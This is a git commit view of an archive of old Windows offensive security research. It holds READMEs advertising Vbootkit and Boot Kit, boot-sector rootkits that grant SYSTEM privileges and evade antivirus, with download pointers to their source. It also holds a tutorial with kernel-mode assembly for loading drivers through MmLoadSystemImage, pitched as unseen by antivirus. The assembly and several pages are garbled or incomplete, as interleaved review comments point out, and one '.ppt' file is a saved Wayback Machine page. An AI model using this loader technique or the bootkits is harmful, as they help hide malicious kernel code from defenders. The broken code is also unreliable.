
the first commit

vkumar 2 years ago

+ 10
- 0 View File

@@ -0,0 +1,10 @@
### Black Hat Europe 2007 & HITB Conf. 2007


Vbootkit White-paper and presentation materials.<br>
The vbootkit white-paper and presentation slides are now online and can be downloaded below.

[Vbootkit Presentation]( <br>
[Vbootkit White Paper](
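Review bot: Both markdown links at the end of this hunk have empty, unclosed targets (`[Vbootkit Presentation]( <br>` and `[Vbootkit White Paper](`), so neither renders as a link. Point them at the files this commit adds under download/ (the white paper appears to be download/vbootkit_nitin_vipin_whitepaper.pdf) and move the `<br>` outside the link parenthesis.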

+ 29
- 0 View File

@@ -0,0 +1,29 @@
### BOOT KIT: Custom boot sector based Windows 2000/XP/2003 Subversion


**BOOT KIT** is a project related to custom boot sector code subverting Windows NT Security Model.The sample presented currently keeps on escalating cmd.exe to system privileges every 30 secs.

**It has several features:**
1. It's very small.The basic framework is just about 100 lines of assembly code.It supports 2000,XP,2003
1. It patches the kernel at runtime(no files are patched on disk).
1. BOOT KIT is PXE-compatible.
1. It can even lead to first ever PXE virus
1. It also enables you to load other root kits if you have physical access(Normally root kits can only be loaded by the administrator

The bootkit has been tested with a number of kernel mode shell codes such as Loading Native Applications and drivers from the shell code another shellcode ,which periodically raises every CMD.EXE to system privileges.

**The Source code will contain 4 levels of BOOT KITs(showcasing different payloads):
1. Basic framework ( Kernel patching has to be done later on) ( available for download )
1. Privilege escalation framework(demonstrates creating new system threads and how to escalate privileges easily) (available for download)
1. Loading drivers and native applications from kernel mode without touching registry
1. PXE compatible code(Basic framework).

Bootkit Basic framework Source Code password nvlabs

Boot Kit Advance Version(support Privilege escalation) Source Code
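Review bot: The bold opened on the `**The Source code will contain 4 levels of BOOT KITs` line is never closed, and feature item 5 is missing its closing parenthesis, so the list renders with stray asterisks and an unbalanced bracket. The two download lines at the bottom (`Bootkit Basic framework Source Code password nvlabs` and `Boot Kit Advance Version(support Privilege escalation) Source Code`) carry no link target at all; link them to the corresponding archives in download/ and put the archive password in its own sentence so readers can tell it is not part of the file name.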

+ 183
- 0 View File

@@ -0,0 +1,183 @@
### Loading drivers and Native applications from kernel mode, without touching registry

"How to load driver without touching registry from kernel mode", this is asked almost always. Today, I will give you an insight into how Windows loads its driver and then will document a new method to load a driver without touching registry.

This is required because even if you exploit kernel vulnerabilities ,you still cannot load any driver because almost all existing Antivirus solutions hijack the NTOSkrnl API's ( which let you write to specific registry locations, load drivers etc).

The first method to load driver is given below:

Windows NT loads drivers using the following function ZwLoadDriver.

Its declaration is as follows:

NTSTATUS ZwLoadDriver (IN PUNICODE_STRING DriverServiceName);

DriverServiceName: Pointer to a counted Unicode string that specifies a path to the driver's registry key, \Registry\Machine\System\CurrentControlSet\Services\DriverName, where DriverName is the name of the driver

The Second Method is given below:

After Windows 2000 start's up, It starts loading the special driver win2k.sys.It doesn't load in the traditional way (as all other drivers are loaded) by calling the following procedures ZwLoadDriver, NtLoadDriver etc.

It actually loads by the following kernel API ZwSetSystemInformation.

This API is used to set system information such as page file, loads the above driver, file cache( information working set) etc.

It is actually implemented as follows:

//specifies operation to do
IN PVOID SystemInformation, //specifies operation data
IN ULONG SystemInformationLength ) //specifies data length

it's internally implemented as follows:

Switch (SystemInformationClass)
Case 0:

Case 1:
Case 5: ;this actually extends the system service descriptor table

call entrypoint(driverobject,NULL) ;

break ;
case 6:

These 2 are the only known method of loading drivers.

Here is the third method. (No antivirus solution currently hijacks it so it is safe).

As seen above ZwSetSysteminformation loadimage function to load driver into memory and then calls its entry point.

Now we will briefly analyze the parameters and functionality of MmLoadSystemImage

MmLoadSystemImage(UNICODE STRING Imagepath, UNICODE STRING prefix optional,UNICODE STRING basename optional,
ULONG unknown=0,PVOID imagehandle,PVOID baseaddress);

ImagePath is a fully qualified NT style pathname
prefix is added to pathname when loading driver

basename is the name system shows after module has been loaded

unknown is unknown

*imagehandle is the handle to section(it's already referenced, so you will have dereference it at unload)

*baseaddress is the address at which image has been loaded in kernel memory

This function actually loads the image in memory, resolves imports,loads dependencies, etc.

In Windbg,u can find the address of above function using "d MmLoadSystemImage" (of course ,symbols are required)

NOTE:- MmLoadSystemimage internally calls and checks the image after loading it into memory so make sure the checksum for the image is fine.This functionality is done by the MiCheckSystemImage.The import resolving job and dependency loading is done by MiResolveImageReferences API.

Thee MmloadSystemimage works as follows: (PseudoCode)

1) traverse existing module list to check whether it has been alredy loaded
2) if it exists return error (image already loaded STATUS_IMAGE_ALREADY_LOADED) and return from call

3) try to open file using Zwopenfile,if file cannot be opened,just return with error code
4) compute image checksum and match it with checksum stored in header
5) if checksum doesn't matches. return with error code
6) create a section with zwcreatesection and then reference it
7) map it into kernel space using mMapViewInSystemSpace
Cool if necessary apply relocations to image using function LdrRelocateImage
9) resolve refrences iusing MiResolveImageReferences
10) then create an entry in psmoduleloadedlist for the module
11) make it writeprotect
12) then close file handle
13) return from call

So, now we have a function which loads image in memory, but what about calling Driver Entry (entry point of driver). This information can be obtained from the PE headers itself after the image successfully loads in memory. This method has been and can used to load and execute drivers, native applications etc directly from kernel mode

Here is the assembly code (kernel mode assembly code). it has been tested on Windows XP SP0 English Version.After minor modifation code runs on win2k,xp,2k3 etc

__asm {

;below code loads the driver in memory
mov dword [Stack],esp //save stack

;paramters as always are passed in reverse
push DWORD Driverbase ;it stores driver base
push DWORD ImageHandle ;it stores section handle
push dword 0
push dword 0
push dword 0
push DWORD U_STRINGloc ;it points to unicode string containing driver to load

mov edi, 0x805c03ae ;MmLoadSystemImage address function on Win XP SP0 English version,(OS and SP dependent data)
call edi
cmp eax,0 ;check whether driver loaded successfully in memory
jne drivernotloaded ; if loading failed, exit without calling entrypoint

;since driver has loaded successfully call its init function both parameters are passed 0
mov DWORD edi, [Driverbase]
mov DWORD ebx ,[edi + 0x3c] ;to get offset of optional header
mov dword ebx,[edi + ebx + 0x18 + 0x10] ; to get entry point ofset from base of code
add edi ,ebx ; add base + entry point to get entry point in memory
push 0 ;
push 0
call edi ;call entry point (Driver Entry in case of Drivers)

mov dword esp,[ Stack] ; correct stack so as execution continues


; Here data and/or variables are stored

; This is the driver to load including path name

;DosDevices@:hooka.sys length 48
db 0x5c,0x00,0x44,0x00,0x6f,0x00,0x73,0x00,0x44,0x00,0x65,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,
db 0x42,0x00,0x3a,0x00,0x5c,0x00,0x68,0x00,0x6f,0x00,0x6f,0x00,0x6b,0x00,0x61,0x00,0x2e,0x00,0x73,0x00,

;it's used to store driver base address
dd 0
;it's used to store section handle
dd 0;

;it is used to store Stack location
dd 0

;structure used for unicode strings in memory
struc U_STRING
Length: resw 1
MaximumLength: resw 1
Buffer: resd 1


//asm code ends here

NOTE: - These API's or functions are not exported by NTOSKRNL, but these exist for internal usage.These functions are not hooked by any anti-virus solutions, so these can be used to load drivers and native application and then run them.

That's all about loading a driver from kernel mode without touching registry.
Also,the code does some error checking,so as no hard error occurs.

Have fun!
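Review bot: The ZwSetSystemInformation prototype and the inline assembly in this hunk are incomplete as shown. The prototype starting at `//specifies operation to do` has lost its first parameter (the comment survives, the `SystemInformationClass` parameter line does not), and the switch pseudocode under it has empty cases. In the assembly, `__asm {` is never closed; the failure branch `jne drivernotloaded` jumps to a label that is never defined and, unlike the success path's `mov dword esp,[ Stack]`, never restores the saved stack pointer; the `U_STRING` struct is declared but no instance with Length, MaximumLength and Buffer filled in for `U_STRINGloc` appears; and the `db` bytes annotated `length 48` are only 40 bytes and stop mid-name. The block also mixes MSVC `__asm { }` with NASM-style `db`/`resw`/`struc` directives and `;` comments, so it will not assemble in either toolchain. Either restore the missing lines from the original article or label the block as pseudocode; keep the remark that `0x805c03ae` is OS and service-pack specific, since the load address is the part a reader is most likely to copy blindly.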

+ 14
- 0 View File

@@ -0,0 +1,14 @@
**NVbit : Accessing Bitlocker volumes from linux**


**This projects details the Internals/Implementaion of BitLocker Encryption system for Vista.**<br>
NVbit is a linux fuse driver to access Windows Vista's Bitlocker Volumes from linux, provided you have the right keys. A white-paper and supporting presentation is also available.The research was done around an year ago.Work was stopped prematurely,Don't expect things in clean/finished shape.The code is in alpha state. <br>

Both the paper and presentation are incomplete draft versions. However, missing things can be referred from nvbit source code. NVbit allows read-only access.(Though writing can be done just in reverse order but still it doesn't exist for now).

[NVbit source sode](

[NVbit Bitlocker presentation](

[NVbit Bitlocker white_paper](
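Review bot: The three links at the end (`[NVbit source sode](`, `[NVbit Bitlocker presentation](`, `[NVbit Bitlocker white_paper](`) have empty, unclosed targets, and the first has a typo (sode). The presentation and white paper this commit adds are download/nvbit_bitlocker_presentation.pdf and download/nvbit_bitlocker_white_paper.pdf; link those and the source archive explicitly. The prose says access works "provided you have the right keys"; stating which key material the FUSE driver expects as input would save readers a trip into the alpha-state source.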

+ 25
- 0 View File

@@ -0,0 +1,25 @@
This repository contains list of public projects kumar have worked upon since 2005. <br>
Old website links have broken but you can find most of the releases here.

|2007 JAN |[Loading drivers and Native applications from kernel mode, without touching registry](|
|2007 FEB| [BOOT KIT: Custom boot sector based Windows 2000/XP/2003 Subversion](|
|2007 APRIL|[Vbootkit in action : Screenshots and Videos](|
|2007 APRIL |[Black Hat Europe 2007 and HITB Conf. 2007](|
|2008 MAY| [ NVbit : Accessing Bitlocker volumes from linux](|
|2009 MAR | [Vbootkit 2.0: Attacking Windows 7 via Boot Sectors](|
|2009 MAY | [Vbootkit 2.0 is open-source(GPL license)](|

<br> <br>

Kumar likes to work on Reverse Engg. , Protocol Analysis, Crypto Analysis, Hardware Analysis and similar interesting technologies.

Cont@ct: vkumar @@
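Review bot: The seven `|2007 JAN |[...](|` rows have no header row and no `|---|---|` delimiter line, so GitHub-flavoured markdown will not render them as a table, and every link target is empty. Add a header such as `| Date | Project |` followed by `|---|---|`, and point each row at the corresponding README in this commit. The contact line `Cont@ct: vkumar @@` is also cut off.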

+ 21
- 0 View File

@@ -0,0 +1,21 @@
### Vbootkit in action : screenshots and videos


Vbootkit in action.



![BOOTMGR Control](

Automatic privilege escalation to SYSTEM
![Automatic privilege escalation to SYSTEM](
SYSTEM rights in Process Explorer<br>
![SYSTEM rights in Process Explorer](
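Review bot: All three image references (`![BOOTMGR Control](`, `![Automatic privilege escalation to SYSTEM](`, `![SYSTEM rights in Process Explorer](`) have empty, unclosed targets, so nothing displays. This commit adds images/screen_bootmgr.JPG, images/screen_system_cmd.jpg and images/screen_system_procexp.jpg, which match the captions; link them. The heading also promises videos, yet download/nitin_vipin_vista_vbootkit_poc_RC1_edited_video.avi and download/nitin_vipin_vista_vbootkit_poc_RC2_video.avi are not referenced from any README; link them here.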

+ 22
- 0 View File

@@ -0,0 +1,22 @@
### Vbootkit 2.0: Attacking Windows 7 via Boot Sectors


This talk will introduce a new tool which allows attacks against Windows 7 via boot sectors. In this talk we will demo Vbootkit 2.0 in action and show how to bypass and circumvent security policies / architecture using customized boot sectors for Windows 7 (x64).<br>
The talk will cover:
1. Windows 7 Boot architecture
1. Vbootkit 2.0 architecture and inner workings
1. insight into the Windows 7 minkernel

We will also demonstrate:
1. The use of Vbootkit in gaining access to a system without leaving traces
1. Leveraging normal programs to escalate system privileges
1. Running unsigned code in kernel
1. Remote command & Control

All this is done, without having any footprint on the HDD (everything is in memory). It also remains invisible to all existing anti-virus solutions.

[Vbootkit 2.0 Attacking Windows 7 (x64) via Boot Sectors](

Vbootkit 2.0 [source]( is available under open-source under GPL license.
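Review bot: The `[Vbootkit 2.0 Attacking Windows 7 (x64) via Boot Sectors](` and `[source](` links have empty, unclosed targets; the slides this commit adds are download/vbootkit2.0-AttackingWindows7viaBootSectors.odp. The closing sentence reads "is available under open-source under GPL license": drop the duplicated "under", name the GPL version, and add a LICENSE file next to the source archive so the licence claim is verifiable from the repository itself.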

+ 167
- 0
download/nitin_vipin_vista_vbootkit.ppt View File

@@ -0,0 +1,167 @@
<!DOCTYPE html>
<title>Wayback Machine</title>
<script src="//" type="text/javascript"></script>
<script type="text/javascript">window.addEventListener('DOMContentLoaded',function(){var v=archive_analytics.values;v.service='wb';v.server_name='';v.server_ms=601;archive_analytics.send_pageview({});});</script><link rel="stylesheet" type="text/css" href="/_static/css/banner-styles.css" />
<link rel="stylesheet" type="text/css" href="/_static/css/iconochive.css" />
<script src="/_static/js/jquery-1.11.1.min.js"></script>
<body style="overflow:hidden;">
<script type="text/javascript" src="/_static/js/timestamp.js" charset="utf-8"></script>
<script type="text/javascript" src="/_static/js/graph-calc.js" charset="utf-8"></script>
<script type="text/javascript" src="/_static/js/auto-complete.js" charset="utf-8"></script>
<script type="text/javascript" src="/_static/js/toolbar.js" charset="utf-8"></script>
<style type="text/css">
body {
margin-top:0 !important;
padding-top:0 !important;
/*min-width:800px !important;*/
.wb-autocomplete-suggestions {
text-align: left; cursor: default; border: 1px solid #ccc; border-top: 0; background: #fff; box-shadow: -1px 1px 3px rgba(0,0,0,.1);
position: absolute; display: none; z-index: 2147483647; max-height: 254px; overflow: hidden; overflow-y: auto; box-sizing: border-box;
.wb-autocomplete-suggestion { position: relative; padding: 0 .6em; line-height: 23px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; font-size: 1.02em; color: #333; }
.wb-autocomplete-suggestion b { font-weight: bold; }
.wb-autocomplete-suggestion.selected { background: #f0f0f0; }
<div id="wm-ipp-base" lang="en" style="display:none;direction:ltr;">
<div id="wm-ipp" style="position:fixed;left:0;top:0;right:0;">
<div id="wm-ipp-inside">
<div style="position:relative;">
<div id="wm-logo" style="float:left;width:130px;padding-top:10px;">
<a href="/web/" title="Wayback Machine home page"><img src="/_static/images/toolbar/wayback-toolbar-logo.png" alt="Wayback Machine" width="110" height="39" border="0" /></a>
<div class="r" style="float:right;">
<div id="wm-btns" style="text-align:right;height:25px;">
<div id="wm-save-snapshot-success">success</div>
<div id="wm-save-snapshot-fail">fail</div>
<a href="#"
onclick="__wm.saveSnapshot('', '20180823185339')"
title="Share via My Web Archive"
<span class="iconochive-web"></span>
<a href=""
title="Sign In"
<span class="iconochive-person"></span>
<span id="wm-save-snapshot-in-progress" class="iconochive-web"></span>
<a href="" title="Get some help using the Wayback Machine" style="top:-6px;"><span class="iconochive-question" style="color:rgb(87,186,244);font-size:160%;"></span></a>
<a id="wm-tb-close" href="#close" onclick="__wm.h(event);return false;" style="top:-2px;" title="Close the toolbar"><span class="iconochive-remove-circle" style="color:#888888;font-size:240%;"></span></a>
<div id="wm-share" style="text-align:right;">
<a href="#" onclick="'', '', 'height=400,width=600'); return false;" title="Share on Facebook" style="margin-right:5px;" target="_blank"><span class="iconochive-facebook" style="color:#3b5998;font-size:160%;"></span></a>
<a href="#" onclick="';via=internetarchive', '', 'height=400,width=600'); return false;" title="Share on Twitter" style="margin-right:5px;" target="_blank"><span class="iconochive-twitter" style="color:#1dcaff;font-size:160%;"></span></a>
<table class="c" style="">
<td class="u" colspan="2">
<form target="_top" method="get" action="/web/submit" name="wmtb" id="wmtb"><input type="text" name="url" id="wmtbURL" value="" onfocus="this.focus();;" /><input type="hidden" name="type" value="replay" /><input type="hidden" name="date" value="20180823185339" /><input type="submit" value="Go" /></form>
<td class="n" rowspan="2" style="width:110px;">
<tr class="m">
<td class="b" nowrap="nowrap"><a href="" title="13 Apr 2018"><strong>Apr</strong></a></td>
<td class="c" id="displayMonthEl" title="You are here: 18:53:39 Aug 23, 2018">AUG</td>
<td class="f" nowrap="nowrap"><a href="" title="26 Jul 2019"><strong>Jul</strong></a></td>
<tr class="d">
<td class="b" nowrap="nowrap"><a href="" title="01:09:29 Apr 13, 2018"><img src="/_static/images/toolbar/wm_tb_prv_on.png" alt="Previous capture" width="14" height="16" border="0" /></a></td>
<td class="c" id="displayDayEl" style="width:34px;font-size:24px;white-space:nowrap;" title="You are here: 18:53:39 Aug 23, 2018">23</td>
<td class="f" nowrap="nowrap"><a href="" title="11:07:13 Jul 26, 2019"><img src="/_static/images/toolbar/wm_tb_nxt_on.png" alt="Next capture" width="14" height="16" border="0" /></a></td>
<tr class="y">
<td class="b" nowrap="nowrap"><a href="" title="08 Apr 2017"><strong>2017</strong></a></td>
<td class="c" id="displayYearEl" title="You are here: 18:53:39 Aug 23, 2018">2018</td>
<td class="f" nowrap="nowrap">2019</td>
<td class="s">
<div id="wm-nav-captures">
<a class="t" href="/web/20180823185339*/" title="See a list of every capture for this URL">10 captures</a>
<div class="r" title="Timespan for captures of this URL">21 Jul 2011 - 26 Jul 2019</div>
<td class="k">
<a href="" id="wm-graph-anchor">
<div id="wm-ipp-sparkline" title="Explore captures for this URL" style="position: relative">
<canvas id="wm-sparkline-canvas" width="600" height="27" border="0"></canvas>
<div style="position:absolute;bottom:0;right:2px;text-align:right;">
<a id="wm-expand" class="wm-btn wm-closed" href="#expand" onclick="__wm.ex(event);return false;"><span id="wm-expand-icon" class="iconochive-down-solid"></span> <span style="font-size:80%">About this capture</span></a>
<div id="wm-capinfo" style="border-top:1px solid #777;display:none; overflow: hidden">
<div style="background-color:#666;color:#fff;font-weight:bold;text-align:center">COLLECTED BY</div>
<div style="padding:3px;position:relative" id="wm-collected-by-content">
<div style="display:inline-block;vertical-align:top;width:50%;">
<span class="c-logo" style="background-image:url(;"></span>
Organization: <a style="color:#33f;" href="" target="_new"><span class="wm-title">Internet Archive</span></a>
<div style="max-height:75px;overflow:hidden;position:relative;">
<div style="position:absolute;top:0;left:0;width:100%;height:75px;background:linear-gradient(to bottom,rgba(255,255,255,0) 0%,rgba(255,255,255,0) 90%,rgba(255,255,255,255) 100%);"></div>
The Internet Archive discovers and captures web pages through many different web crawls.

At any given time several distinct crawls are running, some for months, and some every day or longer.

View the web archive through the <a href="">Wayback Machine</a>.
<div style="display:inline-block;vertical-align:top;width:49%;">
<span class="c-logo" style="background-image:url("></span>
<div>Collection: <a style="color:#33f;" href="" target="_new"><span class="wm-title">Wide Crawl Number 17: Started August 3rd, 2018 - Still running</span></a></div>
<div style="max-height:75px;overflow:hidden;position:relative;">
<div style="position:absolute;top:0;left:0;width:100%;height:75px;background:linear-gradient(to bottom,rgba(255,255,255,0) 0%,rgba(255,255,255,0) 90%,rgba(255,255,255,255) 100%);"></div>
<div><span style="font-size: 16px; font-family: Arial;">Wide17 was seeded with the "Total Domains" list of 256,796,456 URLs provided by&nbsp;</span><span style="font-size: 16px; font-family: Arial;"><a href="">Domains Index</a>&nbsp;</span><span style="font-size: 16px; font-family: Arial;">on June 26th, and crawled with max-hops set to "3" and de-duplication set "on".</span><br style="font-size: 16px; font-family: Arial;"></div><div>&nbsp;&nbsp;</div>
<div style="background-color:#666;color:#fff;font-weight:bold;text-align:center" title="Timestamps for the elements of this page">TIMESTAMPS</div>
<div id="wm-capresources" style="margin:0 5px 5px 5px;max-height:250px;overflow-y:scroll !important"></div>
<div id="wm-capresources-loading" style="text-align:left;margin:0 20px 5px 5px;display:none"><img src="/_static/images/loading.gif" alt="loading" /></div>
</div></div></div></div><script type="text/javascript">,27,25,2,"web","","2018-08-23",1996,"/_static/",['css/banner-styles.css','css/iconochive.css']);
<!-- END WAYBACK TOOLBAR INSERT --><iframe id="playback" src="" frameborder="0" style="position:absolute;top:65px;left:0;width:100%;">
<script type="text/javascript">
var margin_top = 65;
function fitPlayback() {
height: (window.innerHeight - margin_top) + 'px',
top: margin_top
$(window).on('resize', function() {
margin_top = 0;
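Review bot: download/nitin_vipin_vista_vbootkit.ppt is not a PowerPoint file: the 167 added lines are a Wayback Machine replay page (`<title>Wayback Machine</title>`, the `wm-ipp` toolbar markup, snapshot `20180823185339`) with an empty `<iframe id="playback" src="">`, so the archive wrapper was saved instead of the presentation itself. Re-download the actual .ppt from the capture and replace this file; as committed, the "Vbootkit Presentation" README link would serve HTML under a .ppt name, which viewers expecting a PowerPoint document will reject.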

download/nitin_vipin_vista_vbootkit_poc_RC1_edited_video.avi View File

download/nitin_vipin_vista_vbootkit_poc_RC2_video.avi View File

download/ View File

download/nvbit_bitlocker_presentation.pdf View File

download/nvbit_bitlocker_white_paper.pdf View File

download/vbootkit2.0-AttackingWindows7viaBootSectors.odp View File

download/ View File

download/vbootkit_nitin_vipin_whitepaper.pdf View File

images/screen_bootmgr.JPG View File

Width: 1024  |  Height: 768  |  Size: 53KB

images/screen_system_cmd.jpg View File

Width: 800  |  Height: 600  |  Size: 414KB

images/screen_system_procexp.jpg View File

Width: 800  |  Height: 600  |  Size: 394KB

images/system.jpg View File

Width: 800  |  Height: 600  |  Size: 111KB